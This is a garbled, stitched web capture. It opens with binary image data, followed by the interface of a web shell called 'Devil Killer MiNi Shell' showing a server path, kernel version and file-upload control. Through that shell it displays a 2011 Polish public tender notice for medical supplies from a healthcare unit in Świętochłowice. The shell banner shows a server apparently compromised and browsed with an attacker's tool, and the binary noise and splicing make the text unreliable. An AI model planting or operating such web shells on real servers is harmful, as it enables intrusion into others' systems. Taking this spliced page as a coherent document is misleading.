JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110601/138910-N-2011.html

<p class="kh_header"><b>Świętochłowice: Dostawa medycznego sprzętu jednorazowego i wielorazowego.</b><br>
<b>Numer ogłoszenia: 138910 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Chorzowska 38, 41-605 Świętochłowice, woj. śląskie, tel. 032 2453338, faks 032 7707435.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa medycznego sprzętu jednorazowego i wielorazowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje XVIII pakietów (części) - Załącznik nr 1:

Pakiet I	-	Akcesoria do tomografu w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet II	-	Akcesoria do sterylizacji w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet III	-	Pojemniki do odsysania w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet IV	-	Zestawy do drenażu w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet V	-	Dreny, cewniki, maski, zgłębniki w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet VI	-	Drobny sprzęt medyczny w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet VII	-	Akcesoria do EKG I USG w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet VIII	-	Papiery w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet IX	-	Próżnociągi w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet X	-	Cewniki, obwody, filtry w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XI	-	Sprzęt anestezjologiczny, ostrza w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XIIA	-	Czujniki w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XIIB	-	Czujniki typu Masimo lub równoważne w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XIII	-	Staplery w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XIV	-	Siatki chirurgiczne do laparoskopowego leczenia przepuklin, narzędzie do pokrywania otrzewna wszczepionej siatki w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XV	-	Siatki chirurgiczne częściowo wchłanialne do operacyjnego leczenia przepuklin w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XVI	-	Oprzyrządowanie do posiadanej diatermii Aesculap lub równoważne w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.
Pakiet XVII	-	Akcesoria laparoskopowe do posiadanych narzędzi f-my RUDOLF lub równoważne w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.

Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:
1.	Dostawy dokonywane będą w oparciu o pisemne zamówienia składane za pomocą faxu przez pracownika Sekcji Zaopatrzenia i Zamówień Publicznych w terminie do 7 dni od daty otrzymania zamówienia do Magazynu mieszczącego się przy ul. Chorzowskiej 36 w Świętochłowicach.
2.	Godziny dostaw do Magazynu: od 8.00 do 14.00. 
3.	Własny transport dostawcy do jednostki zamawiającej wraz z wniesieniem towaru na miejsce wskazane przez pracownika.
4.	Przy dostawie towar będzie poddany kontroli ilościowej.

Wykonawca, który oferuje rozwiązania równoważne opisanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.

Zamawiający dopuszcza składanie ofert na sprzęt medyczny w innych opakowaniach jednostkowych, obowiązują wtedy przeliczenia ilości do wartości sumarycznej podanej przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8, 33.14.14.11-4, 33.14.16.00-6, 33.14.16.40-8, 33.14.12.00-2, 33.15.71.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia  2004 r. Prawo Zamówień Publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 j.t. z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Wykonawca obowiązany jest przedstawić wykaz wykonanych lub wykonywanych  dostaw  w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie. 
Wykonawca wykaże wykonanie/wykonywanie minimum 3 dostaw (rozumianych jako wykonanie umowy w całości lub w części) odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że dostawy zostały  wykonane lub są wykonywane należycie.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu i wykazania braku podstaw do wykluczenia z postępowania.

Jeżeli wykonawca polegać będzie na wiedzy, doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia  2004 r. Prawo Zamówień Publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 j.t. z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia  2004 r. Prawo Zamówień Publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 j.t. z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia  2004 r. Prawo Zamówień Publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 j.t. z późn. zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz ofertowy wraz z oświadczeniem o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 j.t.)- Załącznik nr 1;
2. w przypadku zaoferowania rozwiązań równoważnych- oświadczenie, iż spełniają one wymagania określone przez Zamawiającego;
3. ulotkę informacyjną producenta w języku polskim- w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem, zawierającą informację o produkcie;
4. kserokopię dokumentów, potwierdzoną za zgodność z oryginałem, dopuszczających dany produkt do obrotu zgodnie z przepisami prawa obecnie obowiązującymi na terenie RP.
5. Pełnomocnictwo do podpisania i złożenia oferty, jeżeli osoba podpisana nie jest wymieniona  w dokumencie rejestracyjnym Wykonawcy. Pełnomocnictwo należy przedłożyć w oryginale lub w formie kopii potwierdzonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z Art. 144  ustawy Prawo Zamówień Publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach:
a)	obniżenia ceny jednostkowej przez Wykonawcę;
b)	zmiany stawki podatku VAT;
c)	konieczności przedłużenia terminu umowy w przypadku nie wykorzystania przez Zamawiającego w trakcie trwania umowy pełnej ilości dostarczanego  przedmiotu umowy - przy zachowaniu dotychczasowej ceny:
d)	zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał się z produkcji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej w Świętochłowicach, ul. Chorzowska 38 -pok. nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 10:00, miejsce: Zespół Opieki Zdrowotnej w Świętochłowicach, ul. Chorzowska 38 - sekretariat - pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - Akcesoria do tomografu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet I - Akcesoria do tomografu w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - Akcesoria do sterylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet II - Akcesoria do sterylizacji w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III - Pojemniki do odsysania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet III - Pojemniki do odsysania w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8, 33.14.16.00-6, 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet IV - Zestawy do drenażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet IV - Zestawy do drenażu w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet V - Dreny, cewniki, maski, zgłębniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet V - Dreny, cewniki, maski, zgłębniki w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8, 33.14.16.00-6, 33.14.16.40-8, 33.14.12.00-2, 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet VI - Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet VI - Drobny sprzęt medyczny w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet VII - Akcesoria do EKG i USG.</p>
